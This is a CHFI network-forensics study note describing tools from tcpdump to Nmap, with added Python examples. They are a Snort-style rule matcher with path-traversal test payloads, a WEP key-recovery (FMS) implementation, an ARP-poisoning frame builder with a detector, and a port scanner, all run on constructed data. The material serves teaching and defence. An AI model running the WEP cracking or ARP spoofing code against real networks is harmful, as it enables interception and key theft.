EC-Council: Computer Hacking Forensic Investigator(CHFI-V10)
Module 8 : Network Forensics
Note ID: 108

Commonly used Network Forensics Tools


Various tools are available for investigating network attacks. Network forensic tools are essential for evidence collection, because most activity of interest now passes over a network from phones, laptops and other devices, and that traffic, once captured, can be replayed and examined long after the event. The commonly used network forensics tools are listed below.

1. tcpdump

tcpdump is a popular command-line tool for capturing and analysing network traffic, primarily on Unix-based systems. With tcpdump, captured traffic can be written (-w) to a pcap file that tools such as Wireshark read for further analysis; a BPF expression on the command line limits what is captured. tcpdump is used either for a quick capture while troubleshooting or for continuous, high-volume capture (rotating files with -C or -G) for later analysis.

2. Wireshark

It would be a surprise if someone worked in cyber security and had not heard of Wireshark. Wireshark is an open-source tool for capturing and analysing traffic, with filters applied through its graphical user interface: capture filters use the same BPF syntax as tcpdump, while display filters use Wireshark's own field syntax (for example tcp.port == 80). On the system where Wireshark runs, the user chooses the interface on which traffic is to be captured.

3. HELIX3

HELIX3 is e-fense's incident response and computer forensics suite, distributed as a bootable live environment for acquiring evidence from a running system. Its Enterprise edition deploys agents across the network, providing visibility across the entire infrastructure so that Internet abuse, data sharing and harassment can be revealed without detection. Features include compliance management, protection from malicious employee behaviour, litigation support and more.

4. NetworkMiner

NetworkMiner is an open-source network forensics tool that reassembles the sessions in a PCAP file and extracts artifacts such as transferred files, images, e-mails and credentials, and it passively fingerprints the hosts it sees (operating system, hostname, open ports). NetworkMiner can also capture live traffic by sniffing a network interface.

5. Splunk

Splunk is a proprietary, highly extensible log aggregation and analysis platform. It ingests, indexes and correlates real-time data in a searchable index and produces searches, graphs, alerts, dashboards and visualizations. In network forensics, Splunk's role is to correlate evidence from many sources (firewall, proxy, IDS, DNS and host logs) on a single timeline.

6. Paraben E3 Digital Forensic

Paraben's E3:P2C is a tried-and-true computer forensic tool that supports a variety of digital data sources, including file systems, network e-mail archives, local e-mail archives, Internet data and more.

7. Snort

Snort is one of the most popular network intrusion detection systems and is available for free. This open-source detection engine uses rules to define malicious network activity and generates an alert as soon as matching traffic is seen. Snort is now maintained by Cisco, which also offers commercial rule subscriptions and products built on it.
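The rule-driven detection described above, as an added example that is not Snort's own code: a small matcher that parses rules in Snort's "action proto src sport -> dst dport (options)" syntax, supports the msg, content (with |hex| escapes), nocase and sid options, resolves $HOME_NET-style variables, and runs the rules over constructed packets. The rules, the variable values and the packets are all constructed for the example.

```python
import re
import ipaddress
from dataclasses import dataclass

# Rule variables as they would be set in snort.conf (constructed values for this example).
VARS = {"HOME_NET": "192.168.1.0/24", "EXTERNAL_NET": "any"}

RULE_RE = re.compile(
    r'^(?P<action>alert|log|pass|drop)\s+(?P<proto>tcp|udp|icmp|ip)\s+'
    r'(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s+'
    r'\((?P<opts>.*)\)\s*$')
OPT_RE = re.compile(r'\s*([a-z_]+)(?::\s*("[^"]*"|[^;]*))?;')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    dst: str
    dport: str
    msg: str
    contents: list   # [(pattern_bytes, nocase), ...]; every entry must match (Snort ANDs them)
    sid: int


def parse_content(text):
    """Snort content string: literal text with |41 42| hex escapes between pipes."""
    out = b''
    for i, seg in enumerate(text.split('|')):
        out += bytes.fromhex(seg) if i % 2 else seg.encode()
    return out


def parse_rule(line):
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError('unparsable rule: ' + line)
    msg, sid, contents = '', 0, []
    for key, val in OPT_RE.findall(m['opts']):
        val = val.strip().strip('"')
        if key == 'msg':
            msg = val
        elif key == 'content':
            contents.append([parse_content(val), False])
        elif key == 'nocase':              # modifies the preceding content option
            contents[-1][1] = True
        elif key == 'sid':
            sid = int(val)
    return Rule(m['action'], m['proto'], m['src'], m['sport'], m['dst'], m['dport'],
                msg, [tuple(c) for c in contents], sid)


def addr_match(spec, ip):
    negate = spec.startswith('!')
    spec = spec.lstrip('!')
    if spec.startswith('$'):
        spec = VARS[spec[1:]]
    hit = spec == 'any' or ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    return hit != negate


def port_match(spec, port):
    if spec == 'any':
        return True
    if ':' in spec:                        # Snort range syntax: 80:88, 1024:, :1023
        lo, hi = spec.split(':')
        return (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    return int(spec) == port


def rule_matches(rule, pkt):
    if rule.proto != 'ip' and rule.proto != pkt['proto']:
        return False
    if not (addr_match(rule.src, pkt['src']) and port_match(rule.sport, pkt['sport'])
            and addr_match(rule.dst, pkt['dst']) and port_match(rule.dport, pkt['dport'])):
        return False
    for pattern, nocase in rule.contents:
        hay, needle = (pkt['payload'].lower(), pattern.lower()) if nocase else (pkt['payload'], pattern)
        if needle not in hay:
            return False
    return True


def run_rules(rules, packets):
    """Alert tuples (sid, msg, src, dst) in packet order, the shape of a Snort alert log."""
    return [(r.sid, r.msg, p['src'], p['dst']) for p in packets for r in rules if rule_matches(r, p)]


RULES = [parse_rule(r) for r in [
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-ATTACK path traversal"; content:"../"; sid:1000001;)',
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-ATTACK phpMyAdmin probe"; content:"phpmyadmin"; nocase; sid:1000002;)',
    'alert tcp any any -> any 21 (msg:"FTP login"; content:"USER "; content:"anonymous"; sid:1000003;)',
]]

# Constructed packets: three that should alert and one outbound request that must not
# (its destination is outside $HOME_NET, so the first two rules do not apply).
PACKETS = [
    {'proto': 'tcp', 'src': '203.0.113.5', 'sport': 51000, 'dst': '192.168.1.10', 'dport': 80,
     'payload': b'GET /../../etc/passwd HTTP/1.1\r\n'},
    {'proto': 'tcp', 'src': '203.0.113.5', 'sport': 51001, 'dst': '192.168.1.10', 'dport': 80,
     'payload': b'GET /PhpMyAdmin/ HTTP/1.1\r\n'},
    {'proto': 'tcp', 'src': '192.168.1.20', 'sport': 40000, 'dst': '198.51.100.7', 'dport': 21,
     'payload': b'USER anonymous\r\n'},
    {'proto': 'tcp', 'src': '192.168.1.20', 'sport': 40001, 'dst': '198.51.100.7', 'dport': 80,
     'payload': b'GET /../ HTTP/1.1\r\n'},
]
```

Running run_rules(RULES, PACKETS) yields one alert per matching packet. Real Snort adds stream reassembly, protocol decoders and many more rule options (pcre, flow, depth/offset, byte_test), so a plain substring match like this one is only the core of what a rule expresses.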

8. Xplico

Xplico is a network forensics analysis tool (NFAT), that is, software that reconstructs the application-level contents (e-mails, HTTP sessions, FTP transfers, VoIP calls and so on) of acquisitions performed with a packet sniffer such as Wireshark, tcpdump or netsniff-ng.

9. CurrPorts

CurrPorts is a NirSoft network monitoring utility for Windows that lists all currently open TCP and UDP ports on the local computer together with the process that owns each one (name, PID and path), the local and remote addresses, and the connection state.
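What a port lister like CurrPorts has to do under the hood, as an added example that is not CurrPorts' code and works on Linux rather than Windows: decode the kernel's socket table in /proc/net/tcp (IPv4 address and port as hex, address in host byte order, state as a hex code), map each socket's inode to the process that holds it via /proc/<pid>/fd, and flag listeners that are not on the documented port list. The table below is constructed; socket_owners() reads the real /proc and is only useful on a live Linux host.

```python
import os

TCP_STATES = {1: 'ESTABLISHED', 2: 'SYN_SENT', 3: 'SYN_RECV', 4: 'FIN_WAIT1', 5: 'FIN_WAIT2',
              6: 'TIME_WAIT', 7: 'CLOSE', 8: 'CLOSE_WAIT', 9: 'LAST_ACK', 10: 'LISTEN', 11: 'CLOSING'}


def decode_addr(field):
    """'0100007F:0277' -> ('127.0.0.1', 631): the IPv4 address is printed in host (little-endian) byte order."""
    ip_hex, port_hex = field.split(':')
    ip = '.'.join(str(int(ip_hex[i:i + 2], 16)) for i in range(6, -1, -2))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        rows.append({'local': decode_addr(f[1]), 'remote': decode_addr(f[2]),
                     'state': TCP_STATES.get(int(f[3], 16), f[3]),
                     'uid': int(f[7]), 'inode': int(f[9])})
    return rows


def socket_owners():
    """inode -> (pid, comm) by walking /proc/*/fd symlinks (Linux only; other users' fds need root)."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir('/proc')):
        try:
            for fd in os.listdir('/proc/%s/fd' % pid):
                target = os.readlink('/proc/%s/fd/%s' % (pid, fd))
                if target.startswith('socket:['):
                    with open('/proc/%s/comm' % pid) as comm:
                        owners[int(target[8:-1])] = (int(pid), comm.read().strip())
        except OSError:
            continue
    return owners


def listeners(rows):
    return [r for r in rows if r['state'] == 'LISTEN']


def unexpected_listeners(rows, expected_ports):
    """Listening sockets outside the documented port list and not bound to loopback: triage starting points."""
    return [r for r in listeners(rows)
            if r['local'][1] not in expected_ports and not r['local'][0].startswith('127.')]


# Constructed /proc/net/tcp snapshot: sshd, cups on loopback, an outbound connection to 10.10.10.14:8080
# by uid 1000, and a uid-1000 listener on 4444 that nobody documented.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18241 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21903 1 0000000000000000 100 0 0 10 0
   2: 1401A8C0:E1B2 0E0A0A0A:1F90 01 00000000:00000000 00:00000000 00000000  1000        0 40211 1 0000000000000000 20 4 30 10 -1
   3: 1401A8C0:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 40350 1 0000000000000000 100 0 0 10 0
"""
```

On a live host, socket_owners()[row['inode']] gives the owning process for each row; ss -tulpn prints the same combination in one go, and /proc/net/tcp6 and /proc/net/udp follow the same layout. A snapshot taken during live response should be saved alongside the capture, because the mapping of ports to processes is lost once the host is powered off.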

10. Capsa

Capsa (Colasoft) is a network analyzer that helps network administrators monitor, troubleshoot and analyze wired and wireless networks. It is an intuitive tool that presents detailed per-host and per-protocol information, which helps in checking whether there is any Trojan activity on a network.

11. AirSnort

AirSnort is a wireless LAN (WLAN) tool that recovers WEP encryption keys. It operates by passively monitoring transmissions and computing the key once enough packets have been gathered. Wired Equivalent Privacy (WEP), the original 802.11/802.11b encryption, has numerous security flaws: its 24-bit initialization vectors repeat quickly on a busy network, and certain "weak" IVs leak key bytes through RC4's key schedule (the Fluhrer, Mantin and Shamir attack), which is what AirSnort exploits. AirSnort is no longer maintained; aircrack-ng performs the same attack, and WEP itself has long been deprecated in favour of WPA2/WPA3.
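How a passive sniffer "computes the key when enough packets have been gathered", as an added example that is not AirSnort's code: an RC4 implementation, WEP framing with its CRC32 integrity value, the FMS vote for each key byte from the weak IVs of the form (A+3, 255, x), and an AirSnort-style search that tries the best-voted candidates depth-first and validates a full key by checking that a captured frame decrypts to a valid ICV. The 40-bit key, the plaintext and the capture are constructed; the capture keeps only the weak-IV frames, where a real one would contain thousands of other frames for each of them.

```python
import struct
import zlib


def rc4(key, data):
    """Plain RC4: key scheduling (KSA) then keystream generation (PRGA) XORed over data."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: IV(3) | key id(1) | RC4(IV || key, plaintext || CRC32 ICV)."""
    icv = struct.pack('<I', zlib.crc32(plaintext))
    return iv + b'\x00' + rc4(iv + key, plaintext + icv)


def wep_check(frame, key):
    """True when the frame decrypts under key to a plaintext whose trailing ICV is valid."""
    pt = rc4(frame[:3] + key, frame[4:])
    return zlib.crc32(pt[:-4]) == struct.unpack('<I', pt[-4:])[0]


def fms_votes(frames, prefix):
    """FMS: votes for key byte A = len(prefix) from frames whose IV starts with A+3 and is 'resolved'."""
    A = len(prefix)
    votes = [0] * 256
    for frame in frames:
        if frame[0] != A + 3:
            continue
        K = list(frame[:3]) + list(prefix)          # K[0..A+2]: the IV plus key bytes already recovered
        S, j = list(range(256)), 0
        for i in range(A + 3):                      # replay the first A+3 steps of the KSA
            j = (j + S[i] + K[i]) % 256
            S[i], S[j] = S[j], S[i]
        x = S[1]
        if x >= A + 3 or (x + S[x]) % 256 != A + 3:
            continue                                # resolved condition fails: this IV says nothing
        z = frame[4] ^ 0xAA                         # first keystream byte: the plaintext starts with LLC DSAP 0xAA
        votes[(S.index(z) - j - S[A + 3]) % 256] += 1    # right with probability about 5%, else random
    return votes


def crack(frames, keylen=5, breadth=4):
    """AirSnort-style search: best-voted candidates per byte, depth-first, full keys checked via the ICV."""
    def dfs(prefix):
        if len(prefix) == keylen:
            return prefix if wep_check(frames[0], prefix) else None
        votes = fms_votes(frames, prefix)
        for b in sorted(range(256), key=lambda b: -votes[b])[:breadth]:
            found = dfs(prefix + bytes([b]))
            if found is not None:
                return found
        return None
    return dfs(b'')


# Constructed capture: a 40-bit key the attack does not know, and the weak-IV frames only.
KEY = bytes.fromhex('2a7cd904e1')
PLAINTEXT = b'\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x1c'   # LLC/SNAP header, then an IPv4 header start
CAPTURE = [wep_encrypt(KEY, bytes([a + 3, 255, x]), PLAINTEXT)
           for a in range(len(KEY)) for x in range(256)]
```

crack(CAPTURE) returns KEY. The reason "enough packets" is millions rather than thousands is visible in the capture: only 256 IVs per key byte are weak in this classical sense, and only about one in twenty of them votes correctly, so a passive attacker waits for the access point to cycle through a large part of the 16.7 million IV values (later attacks, as implemented in aircrack-ng, need far fewer frames).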

12. Ettercap

Ettercap is a free and open-source suite for man-in-the-middle attacks on a LAN. It sniffs live connections, filters content on the fly, and supports active and passive dissection of many protocols (including encrypted ones, where it can insert itself into the handshake) along with many features for network and host analysis. It is used for network analysis and security auditing, runs on Linux, BSD, Mac OS X and Windows, and can sniff traffic, capture passwords and more. Its usual way of getting between two hosts on a switched network is ARP poisoning.

13. dsniff

As the name implies, dsniff is a network sniffer, but it is really a suite of tools (dsniff, arpspoof, dnsspoof, macof and others). Besides passively collecting passwords, it can disrupt the normal behaviour of switched networks: arpspoof poisons the ARP caches of two hosts and macof floods the switch's MAC table, so that traffic from other hosts on the same segment becomes visible, not just traffic involving the host dsniff is running on.
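The ARP poisoning that Ettercap and arpspoof use to see other hosts' traffic on a switched segment, as an added example that is not the code of either tool: it builds the two forged replies the attacker repeats (each side is told the other "is at" the attacker's MAC), parses them back, and runs a passive arpwatch-style detector over a constructed sequence of frames to show how the attack shows up in a capture. All addresses are constructed.

```python
import struct

ETH_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(text):
    return bytes.fromhex(text.replace(':', ''))


def ip_bytes(text):
    return bytes(map(int, text.split('.')))


def mac_str(raw):
    return ':'.join('%02x' % b for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying one ARP packet; replies go unicast to the target, requests broadcast."""
    eth_dst = mac_bytes(target_mac if op == ARP_REPLY else 'ff:ff:ff:ff:ff:ff')
    eth = eth_dst + mac_bytes(sender_mac) + struct.pack('!H', ETH_ARP)
    arp = struct.pack('!HHBBH6s4s6s4s', 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode the ARP packet in an Ethernet frame, or None if the frame is not ARP."""
    if struct.unpack('!H', frame[12:14])[0] != ETH_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack('!HHBBH6s4s6s4s', frame[14:42])
    return {'op': op, 'sender_mac': mac_str(smac), 'sender_ip': '.'.join(map(str, sip)),
            'target_mac': mac_str(tmac), 'target_ip': '.'.join(map(str, tip))}


def spoof_pair(victim_ip, victim_mac, gateway_ip, gateway_mac, attacker_mac):
    """The two forged replies an ARP-poisoning MITM resends every few seconds: the victim is told
    the gateway is at the attacker's MAC, and the gateway is told the same about the victim."""
    return [build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)]


class ArpWatch:
    """Passive detector: remembers the first MAC seen for each IP (or a static table supplied by
    the analyst) and alerts when a later reply claims a different MAC for that IP."""

    def __init__(self, static=None):
        self.table = dict(static or {})
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt['op'] != ARP_REPLY:
            return
        known = self.table.get(pkt['sender_ip'])
        if known is None:
            self.table[pkt['sender_ip']] = pkt['sender_mac']
        elif known != pkt['sender_mac']:
            self.alerts.append(('flip-flop', pkt['sender_ip'], known, pkt['sender_mac']))


GATEWAY_IP, GATEWAY_MAC = '192.168.1.1', '00:11:22:33:44:01'
VICTIM_IP, VICTIM_MAC = '192.168.1.20', '00:11:22:33:44:20'
ATTACKER_MAC = '00:11:22:33:44:66'


def demo():
    """Constructed traffic: one legitimate gateway reply, then two rounds of poisoning; returns the alerts."""
    watch = ArpWatch(static={VICTIM_IP: VICTIM_MAC})    # gateway binding is learned, the victim's is pinned
    watch.observe(build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    for frame in spoof_pair(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC, ATTACKER_MAC) * 2:
        watch.observe(frame)
    return watch.alerts
```

demo() returns four flip-flop alerts, two per poisoning round, each naming the IP, the MAC it had and the MAC now claimed. A learning-only detector is itself poisonable: whatever MAC it sees first becomes "known", which is why the victim's binding is pinned from a static table here and why, in a real investigation, the switch's own MAC table and DHCP leases are the reference rather than the first frames in the capture.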

14. SmartWhois

SmartWhois (TamoSoft) is a useful network information utility that looks up all the available registration information about an IP address, hostname or domain, including country, state or province, city, name of the network provider, and administrator and technical support contact details.

15. NMAP

Nmap is an open-source network scanner, available as a command-line tool (and with the Zenmap GUI) on Linux, Windows and macOS, used for network exploration, host discovery, port scanning, service and OS detection, and security auditing. Gordon Lyon (pseudonym Fyodor Vaskovich) created it to map an entire network easily and find its open ports and services. In an investigation Nmap is an active tool: scanning a compromised host alters its state and generates traffic, so it is used with authorization and its output saved (-oA) as part of the case record.
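The port-scanning step described above, as an added example that is not Nmap's code: a TCP connect scan (what nmap -sT does) that classifies each port as open, closed or filtered from how the connect() attempt ends, followed by a banner grab of the kind nmap -sV starts with. The target is constructed inside the example, a loopback listener on an ephemeral port that answers with an SSH-style banner, so the scan runs offline and against nothing but the local machine.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """Equivalent of nmap -sT: a full connect() to each port. A completed handshake is 'open',
    an RST (ConnectionRefusedError) is 'closed', and silence until the timeout is 'filtered'."""
    def probe(port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return port, 'open'
        except ConnectionRefusedError:
            return port, 'closed'
        except (socket.timeout, OSError):
            return port, 'filtered'
        finally:
            sock.close()
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(probe, ports))


def grab_banner(host, port, timeout=0.5):
    """What nmap -sV starts with: connect and read whatever the service volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            return sock.recv(128)
        except socket.timeout:
            return b''


def start_fake_service(banner=b'SSH-2.0-OpenSSH_9.6\r\n'):
    """Constructed target for the demo: a loopback listener on an ephemeral port that sends a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('127.0.0.1', 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass            # the scanner hung up before reading; nmap -sT does the same

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Scan the fake service plus four neighbouring ports; returns (port, scan results, banner)."""
    port = start_fake_service()
    window = range(port - 2, port + 3)
    return port, tcp_connect_scan('127.0.0.1', window), grab_banner('127.0.0.1', port)
```

A connect scan is the noisiest option because every open port sees a completed connection (and logs it); nmap's default SYN scan (-sS) needs raw sockets and never finishes the handshake. Both are active: on a network under investigation, run them only with authorization, note the time, and keep the output with the case.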
